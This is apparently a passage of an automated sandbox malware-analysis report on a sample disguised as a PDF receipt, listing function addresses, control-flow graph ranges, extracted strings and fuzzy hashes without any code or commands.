                                                                                                                                                          • Opcode ID: c5b9e1044e6dcc962fc62cda695c21ae671a42ebf09f1f5b8f8da74b33cf8ffb
                                                                                                                                                          • Instruction ID: cac7a070a74b53c05b9d12856ba9b264c04a45f73ce5cb6b347b17bef7b95547
                                                                                                                                                          • Opcode Fuzzy Hash: c5b9e1044e6dcc962fc62cda695c21ae671a42ebf09f1f5b8f8da74b33cf8ffb
                                                                                                                                                          • Instruction Fuzzy Hash: 2081C2B4E012198FDB58CFEAC984A9EFBB2FF89300F14912AD915AB254D7349906CF54
                                                                                                                                                          Function 01651341 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 526 1651341-1651342 527 1651344-1651347 526->527 528 16513a1-16513c4 526->528 527->528 529 16513c6-16513cd 528->529 530 16513d0-16513ec 528->530 529->530 531 16513ee-16513f5 530->531 532 16513f8-165147b 530->532 531->532 533 1651482-16514dc call 16500e4 532->533 534 165147d 532->534 538 16514df 533->538 534->533 539 16514e6-1651502 538->539 540 1651504 539->540 541 165150b-165150c 539->541 540->538 542 1651584-1651591 540->542 543 16515b7-16515ed call 1651bd0 540->543 544 1651511-165154a 540->544 545 165156d-165157f 540->545 546 165154c-1651568 540->546 547 165162f-1651633 540->547 548 165165f-16516cf call 16500f4 540->548 549 165160a-165162a 540->549 541->544 541->548 558 165159a-16515b2 542->558 563 16515f3-1651605 543->563 544->539 545->539 546->539 550 1651635-1651644 547->550 551 1651646-165164d 547->551 567 16516d1 call 1652da5 548->567 568 16516d1 call 1652568 548->568 569 16516d1 call 1652a3b 548->569 549->539 554 1651654-165165a 550->554 551->554 554->539 558->539 563->539 565 16516d7-16516e1 567->565 568->565 569->565
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: -7v$RBtd$Tekq$Tekq
                                                                                                                                                          • API String ID: 0-658814337
                                                                                                                                                          • Opcode ID: 26f7b79e9a2353855a4cd65007ad7ad91a3caaf160b5ae067515020d352e52c1
                                                                                                                                                          • Instruction ID: ec1367bf9477f290a6771452b4bff412f24ef5b7994b86e52d91fdd878f99224
                                                                                                                                                          • Opcode Fuzzy Hash: 26f7b79e9a2353855a4cd65007ad7ad91a3caaf160b5ae067515020d352e52c1
                                                                                                                                                          • Instruction Fuzzy Hash: 1BB12774E05359DFCB48CFA9C8806DEBBB2FF89310F14906AE919AB255D7359A02CF50
                                                                                                                                                          Function 0B840AD0 Relevance: 2.7, Strings: 2, Instructions: 240COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 817 b840ad0-b840b04 818 b840b06-b840b08 817->818 819 b840b09-b840b10 817->819 818->819 820 b840b12-b840b14 819->820 821 b840b18-b840b50 819->821 820->821 822 b840b54-b840b93 821->822 823 b840b52 821->823 824 b840b95 822->824 825 b840b9a-b840c40 822->825 823->822 824->825 832 b840c41 825->832 833 b840c48-b840c64 832->833 834 b840c66 833->834 835 b840c6d-b840c6e 833->835 834->832 834->835 836 b840cf5-b840d11 834->836 837 b840d16-b840d1c 834->837 838 b840d60-b840dd0 834->838 839 b840c73-b840ca9 834->839 840 b840d3b-b840d5b 834->840 841 b840cab-b840caf 834->841 842 b840cdb-b840cf0 834->842 835->838 836->833 862 b840d1e call b8412d8 837->862 863 b840d1e call b8412c9 837->863 855 b840dd2 call b841dd4 838->855 856 b840dd2 call b841d50 838->856 857 b840dd2 call b841c90 838->857 858 b840dd2 call b842940 838->858 859 b840dd2 call b841dc1 838->859 860 b840dd2 call b841c81 838->860 861 b840dd2 call b842958 838->861 839->833 840->833 843 b840cb1-b840cc0 841->843 844 b840cc2-b840cc9 841->844 842->833 845 b840cd0-b840cd6 843->845 844->845 845->833 847 b840d24-b840d36 847->833 854 b840dd8-b840de2 855->854 856->854 857->854 858->854 859->854 860->854 861->854 862->847 863->847
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          • Opcode ID: 118c89f039b831fdadca7e3d48fa335e960adbcb2ab5be9d92284f95a15583bb
                                                                                                                                                          • Instruction ID: d0ce0406f5151799a6af32c4d2e9f999a21129f030c78a88b77f98ec7e66a24f
                                                                                                                                                          • Opcode Fuzzy Hash: 118c89f039b831fdadca7e3d48fa335e960adbcb2ab5be9d92284f95a15583bb
                                                                                                                                                          • Instruction Fuzzy Hash: 7AB16774E05259CFDB05CFE9C880A9EBFF2BF8A304F1480AAD915AB269D7305806CF51
                                                                                                                                                          Function 0B846008 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 908 b846008-b84603a 910 b846041-b846066 908->910 911 b84603c 908->911 912 b846067 910->912 911->910 913 b84606e-b84608a 912->913 914 b846093-b846094 913->914 915 b84608c 913->915 916 b846244-b84624d 914->916 917 b846099-b8460d8 914->917 915->912 915->916 915->917 918 b846147-b846159 915->918 919 b846203-b846216 915->919 920 b8461a3-b8461ac 915->920 921 b8461e8-b8461fe 915->921 922 b846175-b84619e 915->922 923 b8461b1-b8461b5 915->923 924 b84615e-b846170 915->924 925 b846119-b846142 915->925 926 b8460da-b846114 915->926 927 b84621b 915->927 917->913 918->913 919->913 920->913 921->913 922->913 928 b8461b7-b8461c6 923->928 929 b8461c8-b8461cf 923->929 924->913 925->913 926->913 932 b846224-b84623f 927->932 930 b8461d6-b8461e3 928->930 929->930 930->913 932->913
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \~$$or
                                                                                                                                                          • API String ID: 0-2796768027
                                                                                                                                                          • Opcode ID: edd610e352f956594cbf79c3f13909fc6caf4195b1435176e0b4eb625d268084
                                                                                                                                                          • Instruction ID: 9b8cc61288e2893aeac3415c5cc7597b79839d5d22ced82f37b83778a0b389d7
                                                                                                                                                          • Opcode Fuzzy Hash: edd610e352f956594cbf79c3f13909fc6caf4195b1435176e0b4eb625d268084
                                                                                                                                                          • Instruction Fuzzy Hash: 6D61E3B4E0520EDFCB18CFAAD5415AEFBF2AF89710F10906AD415F7264E7789A418F50
                                                                                                                                                          Function 0B846018 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 938 b846018-b84603a 939 b846041-b846066 938->939 940 b84603c 938->940 941 b846067 939->941 940->939 942 b84606e-b84608a 941->942 943 b846093-b846094 942->943 944 b84608c 942->944 945 b846244-b84624d 943->945 946 b846099-b8460d8 943->946 944->941 944->945 944->946 947 b846147-b846159 944->947 948 b846203-b846216 944->948 949 b8461a3-b8461ac 944->949 950 b8461e8-b8461fe 944->950 951 b846175-b84619e 944->951 952 b8461b1-b8461b5 944->952 953 b84615e-b846170 944->953 954 b846119-b846142 944->954 955 b8460da-b846114 944->955 956 b84621b 944->956 946->942 947->942 948->942 949->942 950->942 951->942 957 b8461b7-b8461c6 952->957 958 b8461c8-b8461cf 952->958 953->942 954->942 955->942 961 b846224-b84623f 956->961 959 b8461d6-b8461e3 957->959 958->959 959->942 961->942
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \~$$or
                                                                                                                                                          • API String ID: 0-2796768027
                                                                                                                                                          • Opcode ID: 77a1e82f2b36bdd03ba17577a57bb1e4d1c78f0d7c1fde2cc577e077f4d24317
                                                                                                                                                          • Instruction ID: a3edc1adfffbf3c68b0768c21a06276c56886950ecd751ef234fe18b94f855c0
                                                                                                                                                          • Opcode Fuzzy Hash: 77a1e82f2b36bdd03ba17577a57bb1e4d1c78f0d7c1fde2cc577e077f4d24317
                                                                                                                                                          • Instruction Fuzzy Hash: 8361F3B4E0520EDBCB18CFA6D5815AEFBB2EF89710F10946AD415F7364E7389A418F50
                                                                                                                                                          Function 0B847990 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?w=>
                                                                                                                                                          • API String ID: 0-1933253675
                                                                                                                                                          • Opcode ID: 21b0c3617b7301d763843236c4793a6a1180c6cf12e916a5f352c2b000e42e52
                                                                                                                                                          • Instruction ID: d8b8c47c322eb15c44af774bcfe5bba68f26a1b954b889988a6f4b9461c05e50
                                                                                                                                                          • Opcode Fuzzy Hash: 21b0c3617b7301d763843236c4793a6a1180c6cf12e916a5f352c2b000e42e52
                                                                                                                                                          • Instruction Fuzzy Hash: E9B1E7B4D0525DDFDB18CFA6D98159EFBB2FF88200F10952AD425EB264EB349A06CF14
                                                                                                                                                          Function 0B847980 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?w=>
                                                                                                                                                          • API String ID: 0-1933253675
                                                                                                                                                          • Opcode ID: cea6e304a6c75d815c42426d2b5e29675134b9e3efdd1ea8fdf3a5b120a0b8e7
                                                                                                                                                          • Instruction ID: f93fd4a78463f245a9b3245fc0f303e9e6f860bb277733867092939f65877a81
                                                                                                                                                          • Opcode Fuzzy Hash: cea6e304a6c75d815c42426d2b5e29675134b9e3efdd1ea8fdf3a5b120a0b8e7
                                                                                                                                                          • Instruction Fuzzy Hash: 3AB1E574E0525DDFDB18CFA6D98159EFBB2FF88200F10952AD415EB264EB349A0ACF14
                                                                                                                                                          Function 0B845638 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 5{
                                                                                                                                                          • API String ID: 0-2291050889
                                                                                                                                                          • Opcode ID: 6dfb90d69cb7ef4d57c599bdab455a534c06c8c77945f758c7a06f70366ca410
                                                                                                                                                          • Instruction ID: 8cde5d20a317f8fe27abe19308da69c7e1f71f62be98b71a0b4f04f1d039df34
                                                                                                                                                          • Opcode Fuzzy Hash: 6dfb90d69cb7ef4d57c599bdab455a534c06c8c77945f758c7a06f70366ca410
                                                                                                                                                          • Instruction Fuzzy Hash: ADA14CB4E0120EDFCB04DFA9D5854AEBBB2FF89310F14846AD415AB368D7349A05CF91
                                                                                                                                                          Function 0B8470D0 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: j4$y
                                                                                                                                                          • API String ID: 0-2391584009
                                                                                                                                                          • Opcode ID: 19edee5114d7da133af366fa21e5cf017d1c7227cd0f33d7aac296065690176b
                                                                                                                                                          • Instruction ID: 5123bd973900d51e545c34df5886bd7ec9b9f1e1387d32fbdc096ec1d504bac7
                                                                                                                                                          • Opcode Fuzzy Hash: 19edee5114d7da133af366fa21e5cf017d1c7227cd0f33d7aac296065690176b
                                                                                                                                                          • Instruction Fuzzy Hash: 3E81E675D0520EEFCB48CFA6D98199EFBB2EF89314F10942AE416EB264D7349942CF10
                                                                                                                                                          Function 0B8470E0 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: j4$y
                                                                                                                                                          • API String ID: 0-2391584009
                                                                                                                                                          • Opcode ID: 1fc6f51a2672aabffaa73720f70b7ec55adc96377790fcb53dbee87572455506
                                                                                                                                                          • Instruction ID: 158349e729d0da261b4643875b01c0b12f77fa636889d120c6987aab6b89af85
                                                                                                                                                          • Opcode Fuzzy Hash: 1fc6f51a2672aabffaa73720f70b7ec55adc96377790fcb53dbee87572455506
                                                                                                                                                          • Instruction Fuzzy Hash: 8581E375D0521EEFCB48CFA6D98089EFBB2EF89314F10942AE416BB264D7349942CF54
                                                                                                                                                          Function 0B843181 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?H,a
                                                                                                                                                          • API String ID: 0-4093759987
                                                                                                                                                          • Opcode ID: 5f139ae3d8ad1af16f5529ca6f0384c99dcf22e8a8fbd390a7f86fb1afcc7fd3
                                                                                                                                                          • Instruction ID: e6b46ce1537ddb39efcba591ea90afd713aed6e502a5a80db3baa402f42851dd
                                                                                                                                                          • Opcode Fuzzy Hash: 5f139ae3d8ad1af16f5529ca6f0384c99dcf22e8a8fbd390a7f86fb1afcc7fd3
                                                                                                                                                          • Instruction Fuzzy Hash: A441F774E04209DFDB44CFA9C581A9EFBF2FF89200F24D5AAD415EB264D7349A41CB45
                                                                                                                                                          Function 08158DA8 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1728885216.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8150000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 920c8ccd1f19ce5ebbb910276ab4d3e060eedb43961b039ad251f46d134c592f
                                                                                                                                                          • Instruction ID: ace9a6979a4865684c4fab0cdddf15974eff1ea879db3109921620813d6035e9
                                                                                                                                                          • Opcode Fuzzy Hash: 920c8ccd1f19ce5ebbb910276ab4d3e060eedb43961b039ad251f46d134c592f
                                                                                                                                                          • Instruction Fuzzy Hash: 9FC17A74E00218CFCF14CFA5D88079ABBB2BF88311F14C5AAD859AB255DB31A985CF91
                                                                                                                                                          Function 01659658 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 236fd4063fb2363aa5f62fbcdaf327f721d160819c0808ecefebffc9650a5b98
                                                                                                                                                          • Instruction ID: fa8f4794b8be04bde21392bc3a66c124bf834972140fa68441acc8542c4b49b5
                                                                                                                                                          • Opcode Fuzzy Hash: 236fd4063fb2363aa5f62fbcdaf327f721d160819c0808ecefebffc9650a5b98
                                                                                                                                                          • Instruction Fuzzy Hash: 95A1A274E01219DFCB54DFA9D984A9EBBF2FF88300F10856AD819AB364DB349945CF50
                                                                                                                                                          Function 0A0F45C0 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731265596.000000000A0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0F0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_a0f0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 31a3ec122ba34853c6bfc008cff44f25441c3c85bd7b3efdc6def8bfa3a57f1b
                                                                                                                                                          • Instruction ID: 6ca643aea6ef3cc6e55fb3c9b77e8cef5907d10845e6045b9987554ea2ba7dc3
                                                                                                                                                          • Opcode Fuzzy Hash: 31a3ec122ba34853c6bfc008cff44f25441c3c85bd7b3efdc6def8bfa3a57f1b
                                                                                                                                                          • Instruction Fuzzy Hash: B9613671D452289FDB64CF66CC407EEBBB6BF8A300F14C5AAC908B6250EB705A85CF40
                                                                                                                                                          Function 0B845A69 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 90baf440f8f662cce5bb885c4c30d40289a8460b2ef5266be3d0a0fd520c334c
                                                                                                                                                          • Instruction ID: 78312528155af6ab8761fbd38602e704dcae0668fc8029077001ec6d4b5ce6dd
                                                                                                                                                          • Opcode Fuzzy Hash: 90baf440f8f662cce5bb885c4c30d40289a8460b2ef5266be3d0a0fd520c334c
                                                                                                                                                          • Instruction Fuzzy Hash: 1D51E7B4E0520A9FCB08CFA5D5864AEFBB2FF89211F14942AD426E7364D7389A058F54
                                                                                                                                                          Function 0B845A78 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9da111f4a605b33d466880047fd86617ceac0fb273fb818c23399554512916f1
                                                                                                                                                          • Instruction ID: 63e4a885354facca970a88a902fb90f7eaa763b455ad27c659cac410325608ea
                                                                                                                                                          • Opcode Fuzzy Hash: 9da111f4a605b33d466880047fd86617ceac0fb273fb818c23399554512916f1
                                                                                                                                                          • Instruction Fuzzy Hash: C851F9B4E0520A9FCB08CFA5D5865EEFBB2FF89211F14942AD426E7364D7389A01CF54
                                                                                                                                                          Function 01651BD0 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bb8d55e386d2297e717ad5f84aa4e0babf2a649ef914e2a29eea408a01ff9da7
                                                                                                                                                          • Instruction ID: 8b14712e5a9e8202279dee23d5676134e10934abab376c42fcc1709566ea92d4
                                                                                                                                                          • Opcode Fuzzy Hash: bb8d55e386d2297e717ad5f84aa4e0babf2a649ef914e2a29eea408a01ff9da7
                                                                                                                                                          • Instruction Fuzzy Hash: D9511B70E052199FCB44CFA9C9406AEFBF2FF89300F14E16AD919B7254D7349A42CBA5
                                                                                                                                                          Function 0B8412D8 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d2f6b64e3131b19c8ea65cd7d8d0df92b2f312c4e61944d506ac3b65fc5e742a
                                                                                                                                                          • Instruction ID: 11008de6ab222a17cb07edb52d570fe7efa5bc861260c25fe7be05842f076be1
                                                                                                                                                          • Opcode Fuzzy Hash: d2f6b64e3131b19c8ea65cd7d8d0df92b2f312c4e61944d506ac3b65fc5e742a
                                                                                                                                                          • Instruction Fuzzy Hash: FE4103B4E04219DFDB08DFAAD8446AEFBF2EB88310F14D06AE419B7254DB3459818B65
                                                                                                                                                          Function 0165331F Relevance: .1, Instructions: 121COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d3ec5b0392eafd547fe5f36f53efe45acbc10c6c2307c06a18f3ad5cc3cd8839
                                                                                                                                                          • Instruction ID: ebd05c23e1785f1502d72154777a5a0dddcf8e892c156dfb89153e6577050c18
                                                                                                                                                          • Opcode Fuzzy Hash: d3ec5b0392eafd547fe5f36f53efe45acbc10c6c2307c06a18f3ad5cc3cd8839
                                                                                                                                                          • Instruction Fuzzy Hash: 23516970D44359DFCB99CFB9C8954DABBB2FF89310F0481AEE8459A246E7358912CF81
                                                                                                                                                          Function 0B8412C9 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: aa924f3c0144eec57ccfee1644819d2d8e3cc0a1c91ce2f9f3c90d79b65e3353
                                                                                                                                                          • Instruction ID: ce73d56121282382cb04a4565b35e46d8d34569a814e2e9098ec276098308584
                                                                                                                                                          • Opcode Fuzzy Hash: aa924f3c0144eec57ccfee1644819d2d8e3cc0a1c91ce2f9f3c90d79b65e3353
                                                                                                                                                          • Instruction Fuzzy Hash: 0F41E5B4E042199FDB08DFAAD8446AEFFF2EF88310F14D06AE419B7254DB3459818F55
                                                                                                                                                          Function 01650871 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 02143d1bfa63e503b41b6d79e03088a09bf9a46749fc0f565114898003b7dc07
                                                                                                                                                          • Instruction ID: ee283c30c4ea921916f043adde8009950ab7ea064775f3fcbbf48e3b59016e41
                                                                                                                                                          • Opcode Fuzzy Hash: 02143d1bfa63e503b41b6d79e03088a09bf9a46749fc0f565114898003b7dc07
                                                                                                                                                          • Instruction Fuzzy Hash: A531EC71E016199FEB59CF6ADC4079EBBB3BFC9300F14C1AAD508A7265EB300A558F51
                                                                                                                                                          Function 0B841C90 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1731475294.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_b840000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 669f9de4fd7b1e225e1f721603cb0ca747c7f06c23647c3d2221fc96b2de38b7
                                                                                                                                                          • Instruction ID: ee2360759b5fba2f12ea53fc66b8755e3abe7c70ac82c0298dfab267c6494403
                                                                                                                                                          • Opcode Fuzzy Hash: 669f9de4fd7b1e225e1f721603cb0ca747c7f06c23647c3d2221fc96b2de38b7
                                                                                                                                                          • Instruction Fuzzy Hash: 7E310671E01618CFDB58CFAAD94469EBBB3AFC9310F14C0A9E409A7364DB315A81CF40
                                                                                                                                                          Function 01652568 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1724030125.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_1650000_rDEKONT-1_16_2025__75kb__pdf.jbxd
